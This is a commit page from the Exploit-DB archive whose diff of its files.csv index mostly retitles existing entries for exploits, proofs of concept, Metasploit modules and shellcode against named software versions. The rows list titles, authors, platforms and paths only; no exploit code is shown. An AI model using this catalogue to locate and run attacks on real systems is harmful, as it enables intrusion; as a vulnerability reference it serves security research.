DB: 2017-10-14

11 new exploits FreeBSD 6.1-RELEASE-p10 - (ftruncate) Local Denial of Service FreeBSD 6.1-RELEASE-p10 - (scheduler) Local Denial of Service FreeBSD 6.1-RELEASE-p10 - 'ftruncate' Local Denial of Service FreeBSD 6.1-RELEASE-p10 - 'scheduler' Local Denial of Service Mozilla Firefox 3.5.10/3.6.6 - WMP Memory Corruption Using Popups Mozilla Firefox 3.5.10/3.6.6 - 'WMP' Memory Corruption Using Popups mIRC 6.1 - DCC SEND Buffer Overflow (1) mIRC 6.1 - DCC SEND Buffer Overflow (2) mIRC 6.1 - 'DCC SEND' Buffer Overflow (1) mIRC 6.1 - 'DCC SEND' Buffer Overflow (2) Adobe Reader 9.1.3 and Acrobat - COM Objects Memory Corruption Remote Code Execution Adobe Reader 9.1.3 / Acrobat - COM Objects Memory Corruption Remote Code Execution Oracle Solaris - 'su' Local Solaris Oracle Solaris - 'su' Local Exploit Mozilla Firefox - Array.reduceRight() Integer Overflow (Metasploit) (2) Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2) Sync Breeze Enterprise 10.1.16 - Buffer Overflow (SEH) (Metasploit) Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes) phpBB RPG Events 1.0 - functions_rpg_events Remote File Inclusion phpBB RPG Events 1.0 - 'functions_rpg_events' Remote File Inclusion cPanel 10.8.x - (cpwrap via MySQLAdmin) Privilege Escalation (PHP) cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation (PHP) WWWISIS 7.1 - (IsisScript) Local File Disclosure / Cross-Site Scripting WWWISIS 7.1 - 'IsisScript' Local File Disclosure / Cross-Site Scripting SCT Campus Pipeline 1.0/2.x/3.x - Render.UserLayoutRootNode.uP Cross-Site Scripting SCT Campus Pipeline 1.0/2.x/3.x - 'Render.UserLayoutRootNode.uP' Cross-Site Scripting YaPiG 0.95b - view.php img_size Parameter Cross-Site Scripting Accelerated Mortgage Manager - Password Field SQL Injection YaPiG 0.95b - 'view.php?img_size' Cross-Site Scripting Accelerated Mortgage Manager - 'Password' SQL Injection YaPiG 0.9x - Thanks_comment.php Cross-Site Scripting YaPiG 0.9x - 'Thanks_comment.php' Cross-Site Scripting Bloq 0.5.4 - 'index.php' page[path] Parameter Remote File Inclusion Bloq 0.5.4 - admin.php page[path] Parameter Remote File Inclusion Bloq 0.5.4 - rss.php page[path] Parameter Remote File Inclusion Bloq 0.5.4 - rss2.php page[path] Parameter Remote File Inclusion Bloq 0.5.4 - rdf.php page[path] Parameter Remote File Inclusion Bloq 0.5.4 - files/mainfile.php page[path] Parameter Remote File Inclusion Xoops 2.2.3 - search.php Cross-Site Scripting Bloq 0.5.4 - 'index.php?page[path]' Remote File Inclusion Bloq 0.5.4 - 'admin.php?page[path]' Remote File Inclusion Bloq 0.5.4 - 'rss.php?page[path]' Remote File Inclusion Bloq 0.5.4 - 'rss2.php?page[path]' Remote File Inclusion Bloq 0.5.4 - 'rdf.php?page[path]' Remote File Inclusion Bloq 0.5.4 - 'files/mainfile.php?page[path]' Remote File Inclusion Xoops 2.2.3 - 'search.php' Cross-Site Scripting Typo3 JobControl 2.14.0 - Cross-Site Scripting / SQL Injection Typo3 Extension JobControl 2.14.0 - Cross-Site Scripting / SQL Injection TYPO3 ke DomPDF Extension - Remote Code Execution TYPO3 Extension ke DomPDF - Remote Code Execution TYPO3 Akronymmanager Extension 0.5.0 - SQL Injection TYPO3 Extension Akronymmanager 0.5.0 - SQL Injection TYPO3 News Module - SQL Injection TYPO3 Extension News - SQL Injection OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting E-Sic Software livre CMS - 'q' Parameter SQL Injection E-Sic Software livre CMS - Autentication Bypass E-Sic Software livre CMS - 'cpfcnpj' Parameter SQL Injection E-Sic Software livre CMS - 'f' Parameter SQL Injection E-Sic Software livre CMS - Cross Site Scripting TYPO3 Extension Restler 1.7.0 - Local File Disclosure Dreambox Plugin BouquetEditor - Cross-Site Scripting phpMyFAQ 2.9.8 - Cross-Site Scripting
2017-10-14 05:01:31 +00:00 · 2017-10-14 05:01:31 +00:00 · 51c5257c7f
commit 51c5257c7f
parent a32f88c4ef
13 changed files with 436 additions and 27 deletions
--- a/files.csv
+++ b/files.csv
@ -395,8 +395,8 @@ id,file,description,date,author,platform,type,port
 2515,platforms/multiple/dos/2515.txt,"Kmail 1.9.1 - (IMG SRC) Remote Denial of Service",2006-10-11,nnp,multiple,dos,0
 2523,platforms/windows/dos/2523.pl,"Microsoft Office 2003 - '.PPT' Local Buffer Overflow (PoC)",2006-10-12,Nanika,windows,dos,0
 2524,platforms/bsd/dos/2524.c,"FreeBSD 5.4/6.0 - 'ptrace PT_LWPINFO' Local Denial of Service",2006-10-12,kokanin,bsd,dos,0
-2541,platforms/bsd/dos/2541.c,"FreeBSD 6.1-RELEASE-p10 - (ftruncate) Local Denial of Service",2006-10-13,kokanin,bsd,dos,0
+2541,platforms/bsd/dos/2541.c,"FreeBSD 6.1-RELEASE-p10 - 'ftruncate' Local Denial of Service",2006-10-13,kokanin,bsd,dos,0
-2542,platforms/bsd/dos/2542.c,"FreeBSD 6.1-RELEASE-p10 - (scheduler) Local Denial of Service",2006-10-13,kokanin,bsd,dos,0
+2542,platforms/bsd/dos/2542.c,"FreeBSD 6.1-RELEASE-p10 - 'scheduler' Local Denial of Service",2006-10-13,kokanin,bsd,dos,0
 2571,platforms/windows/dos/2571.pl,"Xfire 1.6.4 - Remote Denial of Service (Perl)",2006-10-16,n00b,windows,dos,0
 2586,platforms/multiple/dos/2586.pl,"Clam AntiVirus 0.88.4 - CHM Chunk Name Length Denial of Service (PoC)",2006-10-17,"Damian Put",multiple,dos,0
 2587,platforms/multiple/dos/2587.txt,"Clam AntiVirus 0.88.4 - 'rebuildpe' Remote Heap Overflow (PoC)",2006-10-17,"Damian Put",multiple,dos,0
@ -1745,7 +1745,7 @@ id,file,description,date,author,platform,type,port
 15215,platforms/multiple/dos/15215.txt,"libc/glob(3) - Resource Exhaustion / Remote ftpd-anonymous (Denial of Service)",2010-10-07,"Maksymilian Arciemowicz",multiple,dos,0
 15598,platforms/windows/dos/15598.pl,"Xion Audio Player 1.0.126 - '.m3u8' Buffer Overflow",2010-11-23,anT!-Tr0J4n,windows,dos,0
 15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 - '.m3u' Buffer Overflow",2010-10-10,"Anastasios Monachos",windows,dos,0
-15242,platforms/windows/dos/15242.html,"Mozilla Firefox 3.5.10/3.6.6 - WMP Memory Corruption Using Popups",2010-10-13,Skylined,windows,dos,0
+15242,platforms/windows/dos/15242.html,"Mozilla Firefox 3.5.10/3.6.6 - 'WMP' Memory Corruption Using Popups",2010-10-13,Skylined,windows,dos,0
 15243,platforms/windows/dos/15243.html,"Oracle Java - APPLET Tag Children Property Memory Corruption",2010-10-13,Skylined,windows,dos,0
 15248,platforms/windows/dos/15248.txt,"Winamp 5.5.8.2985 - Multiple Buffer Overflows",2010-10-13,"Luigi Auriemma",windows,dos,0
 15250,platforms/windows/dos/15250.py,"Ease Jukebox 1.30 - Denial of Service",2010-10-14,Sweet,windows,dos,0
@ -2997,8 +2997,8 @@ id,file,description,date,author,platform,type,port
 23235,platforms/windows/dos/23235.txt,"OpenOffice 1.0.1 - Remote Access Denial of Service",2003-10-08,"Marc Schoenefeld",windows,dos,0
 23236,platforms/hp-ux/dos/23236.txt,"HP-UX 11 CDE DTPrintInfo - Display Environment Variable Buffer Overflow",2003-10-08,"Davide Del Vecchio",hp-ux,dos,0
 23239,platforms/linux/dos/23239.c,"IRCnet IRCD 2.10 - Local Buffer Overflow",2003-10-13,millhouse,linux,dos,0
-23240,platforms/windows/dos/23240.pl,"mIRC 6.1 - DCC SEND Buffer Overflow (1)",2003-10-13,"Takara Takaishi",windows,dos,0
+23240,platforms/windows/dos/23240.pl,"mIRC 6.1 - 'DCC SEND' Buffer Overflow (1)",2003-10-13,"Takara Takaishi",windows,dos,0
-23241,platforms/windows/dos/23241.pl,"mIRC 6.1 - DCC SEND Buffer Overflow (2)",2003-10-13,DarkAngel,windows,dos,0
+23241,platforms/windows/dos/23241.pl,"mIRC 6.1 - 'DCC SEND' Buffer Overflow (2)",2003-10-13,DarkAngel,windows,dos,0
 23242,platforms/windows/dos/23242.pl,"WinSyslog Interactive Syslog Server 4.21 - long Message Remote Denial of Service",2003-10-14,storm@securiteam.com,windows,dos,0
 23245,platforms/linux/dos/23245.pl,"Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service",2003-10-15,"Oliver Karow",linux,dos,0
 23246,platforms/windows/dos/23246.txt,"SumatraPDF 2.1.1/MuPDF 1.0 - Integer Overflow",2012-12-09,beford,windows,dos,0
@ -4217,7 +4217,7 @@ id,file,description,date,author,platform,type,port
 33269,platforms/linux/dos/33269.txt,"Dopewars Server 1.5.12 - 'REQUESTJET' Message Remote Denial of Service",2009-10-15,"Doug Prostko",linux,dos,0
 33271,platforms/windows/dos/33271.py,"VMware Player / VMware Workstation 6.5.3 - 'VMware-authd' Remote Denial of Service",2009-10-07,shinnai,windows,dos,0
 33280,platforms/hardware/dos/33280.txt,"Palm WebOS 1.0/1.1 - 'LunaSysMgr' Service Denial of Service",2009-10-13,"Townsend Ladd Harris",hardware,dos,0
-33283,platforms/linux/dos/33283.txt,"Adobe Reader 9.1.3 and Acrobat - COM Objects Memory Corruption Remote Code Execution",2009-10-13,Skylined,linux,dos,0
+33283,platforms/linux/dos/33283.txt,"Adobe Reader 9.1.3 / Acrobat - COM Objects Memory Corruption Remote Code Execution",2009-10-13,Skylined,linux,dos,0
 33289,platforms/linux/dos/33289.txt,"Linux Kernel 2.6.x - '/drivers/net/r8169.c' Out-of-IOMMU Error Local Denial of Service",2009-08-28,"Alistair Strachan",linux,dos,0
 33306,platforms/linux/dos/33306.txt,"Snort 2.8.5 - Multiple Denial of Service Vulnerabilities",2009-10-22,"laurent gaffie",linux,dos,0
 33312,platforms/linux/dos/33312.txt,"Mozilla Firefox 3.5.3 - Floating Point Conversion Heap Overflow",2009-10-27,"Alin Rad Pop",linux,dos,0
@ -6959,7 +6959,7 @@ id,file,description,date,author,platform,type,port
 15206,platforms/bsd/local/15206.c,"FreeBSD - 'pseudofs' Null Pointer Dereference Privilege Escalation",2010-10-04,"Babcia Padlina",bsd,local,0
 15285,platforms/linux/local/15285.c,"Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0
 15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - '.m3u' Buffer Overflow",2010-11-23,0v3r,windows,local,0
-15245,platforms/solaris/local/15245.txt,"Oracle Solaris - 'su' Local Solaris",2010-10-13,prdelka,solaris,local,0
+15245,platforms/solaris/local/15245.txt,"Oracle Solaris - 'su' Local Exploit",2010-10-13,prdelka,solaris,local,0
 15609,platforms/windows/local/15609.txt,"Microsoft Windows Vista/7 - Privilege Escalation (UAC Bypass)",2010-11-24,noobpwnftw,windows,local,0
 15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker - '$ORIGIN' Expansion",2010-10-18,"Tavis Ormandy",linux,local,0
 15279,platforms/windows/local/15279.rb,"Fat Player 0.6b - '.wav' Buffer Overflow (SEH)",2010-10-18,"James Fitts",windows,local,0
@ -11676,7 +11676,7 @@ id,file,description,date,author,platform,type,port
 17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - 'SVG Layout' Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0
 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0
 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0
-17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - Array.reduceRight() Integer Overflow (Metasploit) (2)",2011-10-13,Metasploit,windows,remote,0
+17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2)",2011-10-13,Metasploit,windows,remote,0
 17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,kingcope,windows,remote,0
 17986,platforms/osx/remote/17986.rb,"Apple Safari - 'file://' Arbitrary Code Execution (Metasploit)",2011-10-17,Metasploit,osx,remote,0
 17993,platforms/windows/remote/17993.rb,"Apple Safari Webkit - libxslt Arbitrary File Creation (Metasploit)",2011-10-18,Metasploit,windows,remote,0
@ -15901,6 +15901,7 @@ id,file,description,date,author,platform,type,port
 42964,platforms/lin_x86-64/remote/42964.rb,"Rancher Server - Docker Daemon Code Execution (Metasploit)",2017-10-09,Metasploit,lin_x86-64,remote,8080
 42965,platforms/multiple/remote/42965.rb,"OrientDB 2.2.2 < 2.2.22 - Remote Code Execution (Metasploit)",2017-10-09,Metasploit,multiple,remote,2480
 42973,platforms/windows/remote/42973.py,"VX Search Enterprise 10.1.12 - Buffer Overflow",2017-10-09,"Revnic Vasile",windows,remote,0
 42984,platforms/windows/remote/42984.rb,"Sync Breeze Enterprise 10.1.16 - Buffer Overflow (SEH) (Metasploit)",2017-10-13,wetw0rk,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16550,6 +16551,7 @@ id,file,description,date,author,platform,type,port
 42646,platforms/arm/shellcode/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
 42647,platforms/arm/shellcode/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
 42791,platforms/lin_x86-64/shellcode/42791.c,"Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",lin_x86-64,shellcode,0
 42977,platforms/lin_x86/shellcode/42977.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",lin_x86,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -17517,13 +17519,13 @@ id,file,description,date,author,platform,type,port
 2545,platforms/php/webapps/2545.pl,"phpBB News Defilante Horizontale 4.1.1 - Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
 2546,platforms/php/webapps/2546.pl,"phpBB lat2cyr Mod 1.0.1 - 'lat2cyr.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
 2547,platforms/php/webapps/2547.pl,"phpBB SpamOborona Mod 1.0b - Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
-2548,platforms/php/webapps/2548.pl,"phpBB RPG Events 1.0 - functions_rpg_events Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
+2548,platforms/php/webapps/2548.pl,"phpBB RPG Events 1.0 - 'functions_rpg_events' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
 2549,platforms/php/webapps/2549.pl,"phpBB SearchIndexer Mod - 'archive_topic.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
 2550,platforms/php/webapps/2550.pl,"phpBB Prillian French Mod 0.8.0 - Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
 2551,platforms/php/webapps/2551.txt,"phpBB ACP User Registration Mod 1.0 - Remote File Inclusion",2006-10-13,bd0rk,php,webapps,0
 2552,platforms/php/webapps/2552.pl,"phpBB Security 1.0.1 - 'PHP_security.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
 2553,platforms/php/webapps/2553.txt,"YaBBSM 3.0.0 - 'Offline.php' Remote File Inclusion",2006-10-13,SilenZ,php,webapps,0
-2554,platforms/php/webapps/2554.php,"cPanel 10.8.x - (cpwrap via MySQLAdmin) Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",php,webapps,0
+2554,platforms/php/webapps/2554.php,"cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",php,webapps,0
 2555,platforms/php/webapps/2555.txt,"CentiPaid 1.4.2 - 'centipaid_class.php' Remote File Inclusion",2006-10-14,Kw3[R]Ln,php,webapps,0
 2556,platforms/php/webapps/2556.txt,"E-Uploader Pro 1.0 - Image Upload / Code Execution",2006-10-14,Kacper,php,webapps,0
 2557,platforms/php/webapps/2557.txt,"IncCMS Core 1.0.0 - 'settings.php' Remote File Inclusion",2006-10-14,Kacper,php,webapps,0
@ -18759,7 +18761,7 @@ id,file,description,date,author,platform,type,port
 4525,platforms/php/webapps/4525.pl,"TikiWiki 1.9.8 - 'tiki-graph_formula.php' Command Execution",2007-10-12,str0ke,php,webapps,0
 4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script - SQL Injection",2007-10-13,"Khashayar Fereidani",php,webapps,0
 4528,platforms/php/webapps/4528.txt,"KwsPHP 1.0 mg2 Module - SQL Injection",2007-10-13,"Mehmet Ince",php,webapps,0
-4529,platforms/cgi/webapps/4529.txt,"WWWISIS 7.1 - (IsisScript) Local File Disclosure / Cross-Site Scripting",2007-10-13,JosS,cgi,webapps,0
+4529,platforms/cgi/webapps/4529.txt,"WWWISIS 7.1 - 'IsisScript' Local File Disclosure / Cross-Site Scripting",2007-10-13,JosS,cgi,webapps,0
 4536,platforms/php/webapps/4536.txt,"doop CMS 1.3.7 - Local File Inclusion",2007-10-15,vladii,php,webapps,0
 4538,platforms/php/webapps/4538.txt,"Artmedic CMS 3.4 - 'index.php' Local File Inclusion",2007-10-16,iNs,php,webapps,0
 4539,platforms/php/webapps/4539.txt,"Okul Otomasyon Portal 2.0 - SQL Injection",2007-10-16,dumenci,php,webapps,0
@ -27834,7 +27836,7 @@ id,file,description,date,author,platform,type,port
 24673,platforms/asp/webapps/24673.txt,"DUforum 3.x - Login Form Password Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
 24674,platforms/asp/webapps/24674.txt,"DUforum 3.x - 'messages.asp FOR_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
 24675,platforms/asp/webapps/24675.txt,"DUforum 3.x - 'messageDetail.asp MSG_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
-24676,platforms/php/webapps/24676.txt,"SCT Campus Pipeline 1.0/2.x/3.x - Render.UserLayoutRootNode.uP Cross-Site Scripting",2004-10-13,"Matthew Oyer",php,webapps,0
+24676,platforms/php/webapps/24676.txt,"SCT Campus Pipeline 1.0/2.x/3.x - 'Render.UserLayoutRootNode.uP' Cross-Site Scripting",2004-10-13,"Matthew Oyer",php,webapps,0
 24680,platforms/cfm/webapps/24680.txt,"FuseTalk Forum 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-10-13,steven,cfm,webapps,0
 24683,platforms/php/webapps/24683.txt,"Pinnacle Systems ShowCenter 1.51 - SettingsBase.php Cross-Site Scripting",2004-10-14,"Secunia Research",php,webapps,0
 24685,platforms/php/webapps/24685.txt,"CoolPHP 1.0 - Multiple Remote Input Validation Vulnerabilities",2004-10-16,R00tCr4ck,php,webapps,0
@ -28931,8 +28933,8 @@ id,file,description,date,author,platform,type,port
 26339,platforms/php/webapps/26339.txt,"Cyphor 0.19 - 'footer.php t_login' Parameter Cross-Site Scripting",2005-10-08,retrogod@aliceposta.it,php,webapps,0
 26343,platforms/php/webapps/26343.txt,"Accelerated E Solutions - SQL Injection",2005-10-11,"Andysheh Soltani",php,webapps,0
 26344,platforms/cgi/webapps/26344.txt,"WebGUI 6.x - Arbitrary Command Execution",2005-10-12,"David Maciejak",cgi,webapps,0
-26345,platforms/php/webapps/26345.txt,"YaPiG 0.95b - view.php img_size Parameter Cross-Site Scripting",2005-10-13,enji@infosys.tuwien.ac.at,php,webapps,0
+26345,platforms/php/webapps/26345.txt,"YaPiG 0.95b - 'view.php?img_size' Cross-Site Scripting",2005-10-13,enji@infosys.tuwien.ac.at,php,webapps,0
-26346,platforms/php/webapps/26346.txt,"Accelerated Mortgage Manager - Password Field SQL Injection",2005-10-13,imready4chillin,php,webapps,0
+26346,platforms/php/webapps/26346.txt,"Accelerated Mortgage Manager - 'Password' SQL Injection",2005-10-13,imready4chillin,php,webapps,0
 26347,platforms/php/webapps/26347.txt,"Gallery 2.0 - main.php Directory Traversal",2005-10-14,"Michael Dipper",php,webapps,0
 26348,platforms/php/webapps/26348.txt,"Complete PHP Counter - SQL Injection",2005-10-14,BiPi_HaCk,php,webapps,0
 26349,platforms/php/webapps/26349.txt,"Complete PHP - Counter Cross-Site Scripting",2005-10-14,BiPi_HaCk,php,webapps,0
@ -30466,7 +30468,7 @@ id,file,description,date,author,platform,type,port
 28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail - Getad.php Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0
 28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 - 'index.php' Remote File Inclusion",2006-08-22,Root3r_H3ll,php,webapps,0
 28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 - HPEInc Parameter Multiple Remote File Inclusion",2006-08-21,"the master",php,webapps,0
-28428,platforms/php/webapps/28428.txt,"YaPiG 0.9x - Thanks_comment.php Cross-Site Scripting",2006-10-13,Kuon,php,webapps,0
+28428,platforms/php/webapps/28428.txt,"YaPiG 0.9x - 'Thanks_comment.php' Cross-Site Scripting",2006-10-13,Kuon,php,webapps,0
 28429,platforms/php/webapps/28429.js,"MyBB 1.1.7 - Multiple HTML Injection Vulnerabilities",2006-08-26,Redworm,php,webapps,0
 28430,platforms/php/webapps/28430.txt,"Jupiter CMS 1.1.5 - 'index.php' Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0
 28431,platforms/php/webapps/28431.txt,"Jetbox CMS 2.1 - 'Search_function.php' Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0
@ -30758,13 +30760,13 @@ id,file,description,date,author,platform,type,port
 28794,platforms/php/webapps/28794.txt,"4Images 1.7 - 'details.php' Cross-Site Scripting",2006-10-12,"Christian Marthen",php,webapps,0
 28795,platforms/php/webapps/28795.php,"FreeWPS 2.11 - 'upload.php' Remote Command Execution",2006-10-12,"HACKERS PAL",php,webapps,0
 28796,platforms/php/webapps/28796.pl,"Buzlas 2006-1 Full - 'Archive_Topic.php' Remote File Inclusion",2006-09-29,"Nima Salehi",php,webapps,0
-28797,platforms/php/webapps/28797.txt,"Bloq 0.5.4 - 'index.php' page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
+28797,platforms/php/webapps/28797.txt,"Bloq 0.5.4 - 'index.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
-28798,platforms/php/webapps/28798.txt,"Bloq 0.5.4 - admin.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
+28798,platforms/php/webapps/28798.txt,"Bloq 0.5.4 - 'admin.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
-28799,platforms/php/webapps/28799.txt,"Bloq 0.5.4 - rss.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
+28799,platforms/php/webapps/28799.txt,"Bloq 0.5.4 - 'rss.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
-28800,platforms/php/webapps/28800.txt,"Bloq 0.5.4 - rss2.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
+28800,platforms/php/webapps/28800.txt,"Bloq 0.5.4 - 'rss2.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
-28801,platforms/php/webapps/28801.txt,"Bloq 0.5.4 - rdf.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
+28801,platforms/php/webapps/28801.txt,"Bloq 0.5.4 - 'rdf.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
-28802,platforms/php/webapps/28802.txt,"Bloq 0.5.4 - files/mainfile.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
+28802,platforms/php/webapps/28802.txt,"Bloq 0.5.4 - 'files/mainfile.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
-28803,platforms/php/webapps/28803.txt,"Xoops 2.2.3 - search.php Cross-Site Scripting",2006-10-13,b0rizQ,php,webapps,0
+28803,platforms/php/webapps/28803.txt,"Xoops 2.2.3 - 'search.php' Cross-Site Scripting",2006-10-13,b0rizQ,php,webapps,0
 28804,platforms/php/webapps/28804.pl,"phpBB Add Name Module - 'Not_Mem.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
 28807,platforms/php/webapps/28807.py,"WHMCompleteSolution (WHMCS) 5.2.7 - SQL Injection",2013-10-08,localhost.re,php,webapps,0
 28808,platforms/php/webapps/28808.txt,"WordPress Plugin Quick Contact Form 6.0 - Persistent Cross-Site Scripting",2013-10-08,Zy0d0x,php,webapps,0
@ -34471,7 +34473,7 @@ id,file,description,date,author,platform,type,port
 34781,platforms/php/webapps/34781.txt,"WordPress Plugin All In One WP Security 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80
 34798,platforms/php/webapps/34798.txt,"ITS SCADA - 'Username' SQL Injection",2010-10-04,"Eugene Salov",php,webapps,0
 34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - Local File Inclusion",2014-09-29,Vulnerability-Lab,ios,webapps,0
-34800,platforms/php/webapps/34800.txt,"Typo3 JobControl 2.14.0 - Cross-Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps,0
+34800,platforms/php/webapps/34800.txt,"Typo3 Extension JobControl 2.14.0 - Cross-Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps,0
 34809,platforms/php/webapps/34809.txt,"Tausch Ticket Script 3 - suchauftraege_user.php userid Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0
 34810,platforms/php/webapps/34810.txt,"Tausch Ticket Script 3 - vote.php descr Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0
 34811,platforms/php/webapps/34811.txt,"Linea21 1.2.1 - 'search' Parameter Cross-Site Scripting",2009-07-08,"599eme Man",php,webapps,0
@ -34855,7 +34857,7 @@ id,file,description,date,author,platform,type,port
 35438,platforms/cgi/webapps/35438.txt,"Cosmoshop 10.05.00 - Multiple Cross-Site Scripting / SQL Injections",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0
 35439,platforms/php/webapps/35439.txt,"WordPress Plugin Nextend Facebook Connect 1.4.59 - Cross-Site Scripting",2014-12-02,"Kacper Szurek",php,webapps,80
 35442,platforms/hardware/webapps/35442.txt,"EntryPass N5200 - Credentials Exposure",2014-12-02,"RedTeam Pentesting",hardware,webapps,0
-35443,platforms/php/webapps/35443.txt,"TYPO3 ke DomPDF Extension - Remote Code Execution",2014-12-02,"RedTeam Pentesting",php,webapps,80
+35443,platforms/php/webapps/35443.txt,"TYPO3 Extension ke DomPDF - Remote Code Execution",2014-12-02,"RedTeam Pentesting",php,webapps,80
 35444,platforms/php/webapps/35444.txt,"Lms Web Ensino - Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,php,webapps,0
 35447,platforms/php/webapps/35447.txt,"WordPress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0
 35451,platforms/php/webapps/35451.txt,"BoutikOne - categorie.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
@ -36035,7 +36037,7 @@ id,file,description,date,author,platform,type,port
 37250,platforms/xml/webapps/37250.txt,"HP WebInspect 10.4 - XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
 39479,platforms/ios/webapps/39479.txt,"InstantCoder 1.0 iOS - Multiple Vulnerabilities",2016-02-22,Vulnerability-Lab,ios,webapps,0
 37298,platforms/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",hardware,webapps,80
-37301,platforms/php/webapps/37301.txt,"TYPO3 Akronymmanager Extension 0.5.0 - SQL Injection",2015-06-16,"RedTeam Pentesting",php,webapps,80
+37301,platforms/php/webapps/37301.txt,"TYPO3 Extension Akronymmanager 0.5.0 - SQL Injection",2015-06-16,"RedTeam Pentesting",php,webapps,80
 37302,platforms/php/webapps/37302.txt,"E-Detective Lawful Interception System - Multiple Vulnerabilities",2015-06-16,"Mustafa Al-Bassam",php,webapps,0
 37304,platforms/php/webapps/37304.txt,"BlackCat CMS 1.1.1 - Arbitrary File Download",2015-06-17,d4rkr0id,php,webapps,80
